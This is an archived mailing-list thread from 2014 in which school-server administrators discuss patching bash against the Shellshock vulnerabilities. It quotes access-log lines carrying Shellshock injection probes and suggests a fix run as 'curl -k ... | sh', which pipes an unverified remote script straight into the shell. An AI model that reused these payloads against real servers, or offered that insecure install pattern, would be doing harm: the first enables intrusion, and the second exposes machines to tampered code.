<div dir="ltr">Yup, the fix was only for CVE-2014-6271.  My XS 0.6 is still vulnerable to CVE-2014-7169.<br><br>I was just looking at my Apache access log to see if anyone was trying the exploits.  Luckily this guy who hit me is a security researcher:<br><br>209.126.230.72 - - [24/Sep/2014:23:55:55 -0500] "GET / HTTP/1.0" 200 2692 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (<a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a>)"<br><br>But I don't think this person is up to any good:<br><br>89.207.135.125 - - [25/Sep/2014:07:04:51 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 77 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"<br><br>My .htaccess is set up to block user agents by keyword, like bot, crawler, google, bing, etc.  I threw the word "ping" in there, at least that'll give a 403 to the above attempt.<br><br>I'll keep an eye on <a href="https://ftp.gnu.org/gnu/bash/bash-4.3-patches/">https://ftp.gnu.org/gnu/bash/bash-4.3-patches/</a> and hope a patch for CVE-2014-7169 lands in there soon.<br><br>Yes, I do need to stop procrastinating and replace this machine.  This old Dell's power supply is going bad.  Takes me about an hour of mysterious fiddling to get it powered back on after shutdown.<br><br>Anna Schoolfield<br>Birmingham<br></div><div class="gmail_extra"><br><div class="gmail_quote">On Thu, Sep 25, 2014 at 9:14 PM, Samuel Greenfeld <span dir="ltr"><<a href="mailto:samuel@greenfeld.org" target="_blank">samuel@greenfeld.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div><div>XS 0.7 school servers are based on CentOS 6.x, which still gets security updates.<br><br></div>So you can log onto your XS 0.7 schoolserver as root, and "yum update bash" to get the latest version.<br><br></div>Note that there is talk that the first fix may not be complete, so you may have to update bash twice.<br><br><div class="gmail_extra"><br><div class="gmail_quote"><div><div class="h5">On Thu, Sep 25, 2014 at 7:04 PM, Anna <span dir="ltr"><<a href="mailto:aschoolf@gmail.com" target="_blank">aschoolf@gmail.com</a>></span> wrote:<br></div></div><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div><div class="h5"><div dir="ltr"><div>The patch that fixes the "shellshocker" exploit isn't, from the best that I can tell, going to be released for Fedora versions older than 17.<br><br>I just patched my XS 0.6 with this:<br><br>curl -k <a href="https://shellshocker.net/fixbash" target="_blank">https://shellshocker.net/fixbash</a> | sh<br><br>You'll need to be able to compile, I'm not sure of any other specific requirements since I installed the Development Tools group on this box a long time ago.<br><br>You can find more information here:  <a href="https://shellshocker.net/" target="_blank">https://shellshocker.net/</a><br><br></div>Anna Schoolfield<br>Birmingham<br></div>
<br></div></div>_______________________________________________<br>
Server-devel mailing list<br>
<a href="mailto:Server-devel@lists.laptop.org" target="_blank">Server-devel@lists.laptop.org</a><br>
<a href="http://lists.laptop.org/listinfo/server-devel" target="_blank">http://lists.laptop.org/listinfo/server-devel</a><br>
<br></blockquote></div><br></div></div>
</blockquote></div><br></div>